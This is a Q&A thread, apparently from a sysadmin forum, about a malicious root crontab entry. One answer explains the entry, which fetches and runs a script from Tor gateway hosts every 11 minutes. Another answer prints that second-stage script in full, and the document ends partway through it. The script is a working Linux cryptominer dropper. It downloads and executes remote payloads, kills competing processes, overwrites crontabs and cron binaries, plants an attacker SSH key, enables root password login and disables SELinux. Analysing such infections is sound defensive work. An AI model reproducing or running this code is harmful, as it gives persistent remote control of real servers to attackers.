# What does this entry in my server's crontab do?

Tags: server, cron, rootkit

I was getting a bunch of emails from cron jobs that looked really weird so I went in to investigate.

I found a weird crontab entry that I have pasted below.

At first I tried to run:

```
crontab -u root -l
```

That displayed the big cron job so I immediately deleted the entry.

```
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
```

I believe that the cron emails will now stop but I'd like to know what this entry was doing.
And how often it was doing it.

Answer (score 0, accepted):

I've reformatted the command and added comments. The command was run every hour, at 11 minutes after the full hour.

```sh
# Get the path to the passwd binary
tbin=$(command -v passwd)

# Get the directory of the passwd binary, for example /usr/bin
bpath=$(dirname "${tbin}")

curl="curl"

# Check if just "curl" is in the PATH
if [ $(curl --version 2> /dev/null | grep "curl " | wc -l) -eq 0 ]; then

    # If it isn't, reset to "echo" and try to find the executable directly
    curl="echo"

    # If we found the path of the passwd binary above
    if [ "${bpath}" != "" ]; then

        # For all files that directory (for example /usr/bin)
        for f in ${bpath}*; do

            # Extract strings from file, check if they contain
            # "CURLOPT_VERBOSE"; if so, set "curl" to the filename and stop -
            # on my system, this sets "curl" to "usr/bin/curl"
            strings $f 2> /dev/null | grep -q "CURLOPT_VERBOSE" \
                && curl="$f" && break
        done
    fi
fi

wget="wget"

# The same for wget: check if it just "wget" works
if [ $(wget --version 2> /dev/null | grep "wgetrc " | wc -l) -eq 0 ]; then

    # It didn't; reset to "echo" (disable wget), try to find executable
    wget="echo"
    if [ "${bpath}" != "" ]; then
        for f in ${bpath}*; do
            # Find a binary containing "to <bug-wget@gnu.org>" and set "wget"
            # to its name
            strings $f 2> /dev/null | grep -q "to <bug-wget@gnu.org>" \
                && wget="$f" && break
        done
    fi
fi

# At this point, "curl" and "wget" are either set to the executables for
# curl/wget or "echo"; it's done in this cumbersome way to find them
# independent of any PATH; if just "curl"/"wget" doesn't work, they go and try
# to find the binary.

# Check if the hosts file contains a line with "onion"
if [ $(cat /etc/hosts | grep -i ".onion." | wc -l) -ne 0 ]; then
    # If it does, replace the contents of the whole hosts file with "127.0.0.1
    # localhost" (which basically does nothing)
    echo "127.0.0.1 localhost" > /etc/hosts > /dev/null 2>&1
fi

# Depending on what was found above, curl and wget are now set to "echo" or the
# executable. This first tries to fetch a file with curl from three different
# URLs, then with wget from the same URLs, and stops after successful download.
#
# The downloaded file is stored in /root/.cache/.ntp, made executable and
# immediately run as a shell script.
(
    ${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 \
        https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp \
        || ${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 \
            https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp \
        || ${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 \
            https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp \
        || ${wget} --quiet --tries=2 --wait=5 --no-check-certificate \
            --connect-timeout=22 --timeout=75 \
            https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp \
        || ${wget} --quiet --tries=2 --wait=5 --no-check-certificate \
            --connect-timeout=22 --timeout=75 \
            https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /root/.cache/.ntp \
        || ${wget} --quiet --tries=2 --wait=5 --no-check-certificate \
            --connect-timeout=22 --timeout=75 \
            https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /root/.cache/.ntp
) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
```

You might want to look at `/root/.cache/.ntp` to figure out what it does.

Comment: Thanks. I looked at `/root/.cache/.ntp` and it's empty. However, even if I remove the crontab, I still keep getting the cron emails. At one point the cron reappeared and I removed it again. Emails keep on coming...

Comment: @escozul I suspect the script might have copied itself to some other place. You might try and look at the file that gets downloaded to see its contents – or wipe the whole thing and restore from a known good backup.

Answer (score 5):

In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.

This is part of a massive malware attack wave that is taking advantage of the [new Exim 0day](https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/) (the malware may was already used before with [a Zimbra 0day](https://forums.zimbra.org/viewtopic.php?t=65932&start=120)).

here's the "an7kmd2wp4xo7hpr.onion.sh/src/ldm" file content :

```
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
fi
if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then
    ${sudo} chmod +x "$0"
    nohup ${sudo} "$0" -n >/dev/null 2>&1 &
    echo 'Sent!'
    exit $?
fi
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; rm -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1
C1="*/9 * * * * ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
C2="*/11 * * * * root ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
${sudo} rm -f /tmp/* >/dev/null 2>&1
${sudo} rm -f /tmp/.* >/dev/null 2>&1
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
#${sudo} pkill sleep >/dev/null 2>&1
#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)
#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi
hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)
if [ "${hload2}" != "" ]; then
    for p in ${hload2}; do
        xm=''
        if [ $p -gt 301 ]; then
            if [ -f /proc/${p}/exe ]; then
                xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)
            elif [ -f /proc/${p}/comm ]; then
                xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
            fi
            if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi
        fi
    done
fi
others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')
if [ "${others}" != "" ]; then
    for o in ${others}; do
        okill=0
        if [ -f "${o}" ]; then
            if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
            if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
            if [ ${okill} -eq 1 ]; then
                ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
                ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
            fi
        fi
    done
fi
net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
    unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
    http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi
if [ ${sudoer} -eq 1 ]; then
    if [ -f /etc/ld.so.preload ]; then
        if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
        >/tmp/.ld.so >/dev/null 2>&1
        ${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
    fi
    #${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;
    if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
    [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
    if [ -f /usr/bin/yum ]; then
        if [ -f /usr/bin/systemctl ]; then
            crstart="systemctl restart crond.service >/dev/null 2>&1"
            crstop="systemctl stop crond.service >/dev/null 2>&1"
        else
            crstart="/etc/init.d/crond restart >/dev/null 2>&1"
            crstop="/etc/init.d/crond stop >/dev/null 2>&1"
        fi
    elif [ -f /usr/bin/apt-get ]; then
        crstart="service cron restart >/dev/null 2>&1"
        crstop="service cron stop >/dev/null 2>&1"
    elif [ -f /usr/bin/pacman ]; then
        crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
        crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
    elif [ -f /sbin/apk ]; then
        crstart="/etc/init.d/crond restart >/dev/null 2>&1"
        crstop="/etc/init.d/crond stop >/dev/null 2>&1"
    fi
    if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then
        if [ -f /usr/bin/yum ]; then
            yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
            yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
            chkconfig sshd on >/dev/null 2>&1
            chkconfig crond on >/dev/null 2>&1;
            if [ -f /usr/bin/systemctl ]; then
                systemctl start sshd.service >/dev/null 2>&1
            else
                /etc/init.d/sshd start >/dev/null 2>&1
            fi
        elif [ -f /usr/bin/apt-get ]; then
            rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
            if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
            ${sudo} systemctl enable ssh
            ${sudo} systemctl enable cron
            ${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
        elif [ -f /usr/bin/pacman ]; then
            pacman -Syy >/dev/null 2>&1
            pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
            systemctl enable --now cronie.service >/dev/null 2>&1
            systemctl enable --now sshd.service >/dev/null 2>&1
            /etc/rc.d/sshd restart >/dev/null 2>&1
        elif [ -f /sbin/apk ]; then
            #apk --no-cache -f upgrade >/dev/null 2>&1
            apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
            apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
            apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
            rc-update add sshd >/dev/null 2>&1
            /etc/init.d/sshd start >/dev/null 2>&1
            if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
        fi
    fi
    ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
    ${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;
    ${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
    ${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1; 
    ${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
    ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
    if [ -f /sbin/apk ]; then
        ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
        ${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
    elif [ -f /usr/bin/apt-get ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
    else
        ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
    fi
    ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
    if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
    ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
    rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)
    if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
        if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then
            ${sudo} "${crstop}"
            cd=$(which crond)
            ct=$(which crontab)
            #if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi
            if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
            ${sudo} "${crstart}"
        fi
    fi
    ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
    if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
    ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
    if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
    if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then  ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi
    ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }
    touch "${LPATH}.sysud"
else
    if [ $(which crontab|wc -l) -ne 0 ]; then
        crontab -r >/dev/null 2>&1
        (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
    fi
fi
rm -rf ./main* >/dev/null 2>&1
rm -rf ./*.ico* >/dev/null 2>&1
rm -rf ./r64* >/dev/null 2>&1
rm -rf ./r32* >/dev/null 2>&1
[ $(echo "$0"|grep -i ".cache"|wc -l) -eq 0 ] && [ "$1" != "" ] && { rm -f "$0" >/dev/null 2>&1; }
echo -e '\n'
(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)
if [ ${sudoer} -eq 1 ]; then
    if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then
        ${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }
        ${sudo} shutdown -r now >/dev/null 2>&1
        ${sudo} reboot -f >/dev/null 2>&1
    fi
